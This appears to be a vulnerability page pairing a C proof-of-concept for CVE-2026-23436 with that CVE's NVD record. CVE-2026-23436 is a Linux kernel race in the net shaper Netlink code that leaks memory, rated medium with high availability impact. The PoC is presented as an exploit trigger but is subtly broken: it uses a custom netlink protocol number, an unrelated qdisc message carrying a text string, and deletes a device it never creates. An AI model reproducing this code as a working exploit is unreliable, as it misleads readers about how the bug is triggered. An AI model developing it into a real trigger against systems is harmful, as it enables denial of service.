CVE-2026-23436

/* * PoC for CVE-2026-23436: Linux Kernel Race Condition in net: shaper * This is a conceptual PoC to trigger the race condition. * Compile with: gcc -o poc_cve2026_23436 poc_cve2026_23436.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <linux/rtnetlink.h> #include <pthread.h> #include <errno.h> #define NETLINK_USER 31 void* trigger_unreg(void* arg) { // Simulate the unregister operation timing usleep(100000); // Adjust timing to hit the race window // In a real exploit, this would involve ioctl or netlink calls to delete the netdev system("ip link delete dev shaper0 type dummy"); return NULL; } int main() { int sock_fd; struct sockaddr_nl src_addr, dest_addr; struct nlmsghdr *nlh = NULL; struct iovec iov; struct msghdr msg; pthread_t thread_id; // Create Netlink socket sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_USER); if (sock_fd < 0) { perror("socket"); return -1; } memset(&src_addr, 0, sizeof(src_addr)); src_addr.nl_family = AF_NETLINK; src_addr.nl_pid = getpid(); bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr)); memset(&dest_addr, 0, sizeof(dest_addr)); dest_addr.nl_family = AF_NETLINK; dest_addr.nl_pid = 0; // Kernel // Setup thread to unregister netdev concurrently pthread_create(&thread_id, NULL, trigger_unreg, NULL); // Send Netlink message to setup shaper hierarchy (triggering the vulnerable path) nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(1024)); memset(nlh, 0, NLMSG_SPACE(1024)); nlh->nlmsg_len = NLMSG_SPACE(1024); nlh->nlmsg_pid = getpid(); nlh->nlmsg_flags = 0; nlh->nlmsg_type = RTM_NEWQDISC; // Example type // Fill payload (simplified for PoC) strcpy(NLMSG_DATA(nlh), "Setup Hierarchy"); iov.iov_base = (void *)nlh; iov.iov_len = nlh->nlmsg_len; memset(&msg, 0, sizeof(msg)); msg.msg_name = (void *)&dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = &iov; msg.msg_iovlen = 1; printf("Sending Netlink message to trigger race...\n"); sendmsg(sock_fd, &msg, 0); printf("Waiting for race to complete...\n"); pthread_join(thread_id, NULL); close(sock_fd); free(nlh); return 0; }

{"cve": {"id": "CVE-2026-23436", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-03T16:16:25.257", "lastModified": "2026-04-23T20:59:33.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: shaper: protect from late creation of hierarchy\n\nWe look up a netdev during prep of Netlink ops (pre- callbacks)\nand take a ref to it. Then later in the body of the callback\nwe take its lock or RCU which are the actual protections.\n\nThe netdev may get unregistered in between the time we take\nthe ref and the time we lock it. We may allocate the hierarchy\nafter flush has already run, which would lead to a leak.\n\nTake the instance lock in pre- already, this saves us from the race\nand removes the need for dedicated lock/unlock callbacks completely.\nAfter all, if there's any chance of write happening concurrently\nwith the flush - we're back to leaking the hierarchy.\n\nWe may take the lock for devices which don't support shapers but\nwe're only dealing with SET operations here, not taking the lock\nwould be optimizing for an error case."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13.1", "versionEndExcluding": "6.18.20", "matchCriteriaId": "A2A94618-E3D4-4741-B60F-78501912CE89"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.10", "matchCriteriaId": "96D34333-38BE-4414-9E79-6EB764329581"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:*", "matchCriteriaId": "5A3F9505-6B98-4269-8B81-127E55A1BF00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/719f6784f918f9e32f3ff3b197f900e852223f9d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d22921727023e7852704965e935f4d1fc83a5ec9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d75ec7e8ba1979a1eb0b9211d94d749cdce849c8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}